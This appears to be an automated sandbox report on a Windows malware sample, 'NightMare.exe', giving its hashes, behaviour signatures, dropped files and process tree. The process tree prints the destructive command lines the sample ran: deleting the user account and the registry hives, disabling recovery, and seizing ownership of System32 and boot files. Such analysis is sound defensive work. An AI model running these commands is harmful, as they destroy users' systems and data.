Analysis

  • max time kernel
    150s
  • max time network
    115s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-03-2024 20:38

General

  • Target

    MyMalwareDatabase-main/MyMalwareDatabase-main/NightMare/NightMare.exe

  • Size

    42KB

  • MD5

    4c5dfe827dd3465bb97016996936fe38

  • SHA1

    010b868fe1a9e637912226a1eda1b73d901347dd

  • SHA256

    366373109445178df10e219c3d58ea40b435c3cc20f80be7398d199aee01f62b

  • SHA512

    e0692e425b7c702d297c88f0495c3bdae53eb566c3128f334d0e87e90a7047c433633f918ab6163a025a488111bcb2f199df0852b338fdc00e524897a2a7d82e

  • SSDEEP

    768:73oACIqXSoiSnWsHorfhH7HjVq9HTtYcFA/Vc6K:7TCxNn/orfhbDVqRD8Vcl

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Possible privilege escalation attempt 15 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 15 IoCs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 1 IoCs
  • Modifies Control Panel 14 IoCs
  • Modifies File Icons 3 IoCs
  • Modifies registry class 40 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\MyMalwareDatabase-main\NightMare\NightMare.exe
    "C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\MyMalwareDatabase-main\NightMare\NightMare.exe"
    1⤵
    • UAC bypass
    • Disables RegEdit via registry modification
    • Checks computer location settings
    • Modifies system executable filetype association
    • Checks whether UAC is enabled
    • Drops file in Windows directory
    • Modifies Control Panel
    • Modifies File Icons
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:3928
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k net user %username% /delete && exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3768
      • C:\Windows\SysWOW64\net.exe
        net user Admin /delete
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3628
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user Admin /delete
          4⤵
            PID:1368
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /k reg delete HKCR && exit
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2080
        • C:\Windows\SysWOW64\reg.exe
          reg delete HKCR
          3⤵
            PID:4764
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k reg delete HKU && exit
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4016
          • C:\Windows\SysWOW64\reg.exe
            reg delete HKU
            3⤵
              PID:3044
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k reg delete HKLM && exit
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2272
            • C:\Windows\SysWOW64\reg.exe
              reg delete HKLM
              3⤵
              • Modifies registry key
              PID:1488
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1736
            • C:\Windows\SysWOW64\takeown.exe
              takeown /F C:\Windows\Boot\DVD\EFI
              3⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              • Suspicious use of AdjustPrivilegeToken
              PID:5004
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k reagentc.exe /disable && pause
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3156
            • C:\Windows\SysWOW64\ReAgentc.exe
              reagentc.exe /disable
              3⤵
              • Drops file in System32 directory
              PID:4628
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k color 47 && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && Exit
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3668
            • C:\Windows\SysWOW64\takeown.exe
              takeown /f C:\Windows\System32
              3⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              • Suspicious use of AdjustPrivilegeToken
              PID:1664
            • C:\Windows\SysWOW64\icacls.exe
              icacls C:\Windows\System32 /grant Admin:F
              3⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:3640
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:8652
            • C:\Windows\SysWOW64\takeown.exe
              takeown /F C:\Windows\Boot\DVD\EFI
              3⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              • Suspicious use of AdjustPrivilegeToken
              PID:6984
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\taskmgr.exe && pause
            2⤵
              PID:7152
              • C:\Windows\SysWOW64\takeown.exe
                takeown /F C:\Windows\system32\taskmgr.exe
                3⤵
                • Possible privilege escalation attempt
                • Modifies file permissions
                • Suspicious use of AdjustPrivilegeToken
                PID:6848
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\LogonUI.exe && pause
              2⤵
                PID:4236
                • C:\Windows\SysWOW64\takeown.exe
                  takeown /F C:\Windows\system32\LogonUI.exe
                  3⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4312
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI\BCD && pause
                2⤵
                  PID:8200
                  • C:\Windows\SysWOW64\takeown.exe
                    takeown /F C:\Windows\Boot\DVD\EFI\BCD
                    3⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3868
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI\boot.sdi && pause
                  2⤵
                    PID:5172
                    • C:\Windows\SysWOW64\takeown.exe
                      takeown /F C:\Windows\Boot\DVD\EFI\boot.sdi
                      3⤵
                      • Possible privilege escalation attempt
                      • Modifies file permissions
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4364
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\drivers && pause
                    2⤵
                      PID:5400
                      • C:\Windows\SysWOW64\takeown.exe
                        takeown /F C:\Windows\system32\drivers
                        3⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        • Suspicious use of AdjustPrivilegeToken
                        PID:7296
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\servicing\TrustedInstaller.exe && pause
                      2⤵
                        PID:6260
                        • C:\Windows\SysWOW64\takeown.exe
                          takeown /F C:\Windows\servicing\TrustedInstaller.exe
                          3⤵
                          • Possible privilege escalation attempt
                          • Modifies file permissions
                          • Suspicious use of AdjustPrivilegeToken
                          PID:7300
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\System32\WUDFHost.exe && pause
                        2⤵
                          PID:7676
                          • C:\Windows\SysWOW64\takeown.exe
                            takeown /F C:\Windows\System32\WUDFHost.exe
                            3⤵
                            • Possible privilege escalation attempt
                            • Modifies file permissions
                            • Suspicious use of AdjustPrivilegeToken
                            PID:7736
                        • C:\Windows\SysWOW64\taskkill.exe
                          "C:\Windows\System32\taskkill.exe" /IM fontdrvhost.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:8260
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
                          2⤵
                            PID:1564
                            • C:\Windows\SysWOW64\takeown.exe
                              takeown /F C:\Windows\Boot\DVD\EFI
                              3⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • Suspicious use of AdjustPrivilegeToken
                              PID:7020
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
                            2⤵
                              PID:8408
                              • C:\Windows\SysWOW64\takeown.exe
                                takeown /F C:\Windows\Boot\DVD\EFI
                                3⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5220
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
                              2⤵
                                PID:7348
                                • C:\Windows\SysWOW64\takeown.exe
                                  takeown /F C:\Windows\Boot\DVD\EFI
                                  3⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:6428
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
                                2⤵
                                  PID:5900
                                  • C:\Windows\SysWOW64\takeown.exe
                                    takeown /F C:\Windows\Boot\DVD\EFI
                                    3⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:7864
                              • C:\Windows\system32\OpenWith.exe
                                C:\Windows\system32\OpenWith.exe -Embedding
                                1⤵
                                • Suspicious use of SetWindowsHookEx
                                PID:5048
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
                                1⤵
                                • Drops desktop.ini file(s)
                                • Checks processor information in registry
                                • Modifies registry class
                                PID:2372
                              • C:\Windows\system32\OpenWith.exe
                                C:\Windows\system32\OpenWith.exe -Embedding
                                1⤵
                                  PID:8928
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
                                  1⤵
                                    PID:3784
                                  • C:\Windows\system32\OpenWith.exe
                                    C:\Windows\system32\OpenWith.exe -Embedding
                                    1⤵
                                      PID:7060
                                    • C:\Windows\system32\OpenWith.exe
                                      C:\Windows\system32\OpenWith.exe -Embedding
                                      1⤵
                                        PID:7524

                                      Network

                                      MITRE ATT&CK Enterprise v15

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE.txt

                                        Filesize

                                        662B

                                        MD5

                                        21ad42bd4156f914d3a265823a1c269c

                                        SHA1

                                        4129bc994a0947b38e3bac2aeabc8e2fbdbd503f

                                        SHA256

                                        680671bac3f22a5f19ffbd2c82eec069a32844cf93d419aa59319cd0cbc98ac2

                                        SHA512

                                        7ec8c3801798b4fd547578d31badd96edeaacf0a91dca807c04e40ad65d97592043cb8e747947f74b9850f8e99dcd1c8f1c311cb0f8b79be301be36ca884cc5a

                                      • C:\Users\Admin\Videos\Captures\desktop.ini

                                        Filesize

                                        190B

                                        MD5

                                        b0d27eaec71f1cd73b015f5ceeb15f9d

                                        SHA1

                                        62264f8b5c2f5034a1e4143df6e8c787165fbc2f

                                        SHA256

                                        86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2

                                        SHA512

                                        7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c

                                      • memory/3928-0-0x0000000000080000-0x0000000000090000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/3928-1-0x0000000075000000-0x00000000757B0000-memory.dmp

                                        Filesize

                                        7.7MB

                                      • memory/3928-2-0x0000000005130000-0x00000000056D4000-memory.dmp

                                        Filesize

                                        5.6MB

                                      • memory/3928-3-0x0000000004A90000-0x0000000004B22000-memory.dmp

                                        Filesize

                                        584KB

                                      • memory/3928-4-0x0000000004CE0000-0x0000000004CF0000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/3928-5-0x0000000004A80000-0x0000000004A8A000-memory.dmp

                                        Filesize

                                        40KB

                                      • memory/3928-12131-0x0000000075000000-0x00000000757B0000-memory.dmp

                                        Filesize

                                        7.7MB

                                      • memory/3928-15840-0x0000000004CE0000-0x0000000004CF0000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/3928-120019-0x0000000004CE0000-0x0000000004CF0000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/3928-120041-0x0000000004CE0000-0x0000000004CF0000-memory.dmp

                                        Filesize

                                        64KB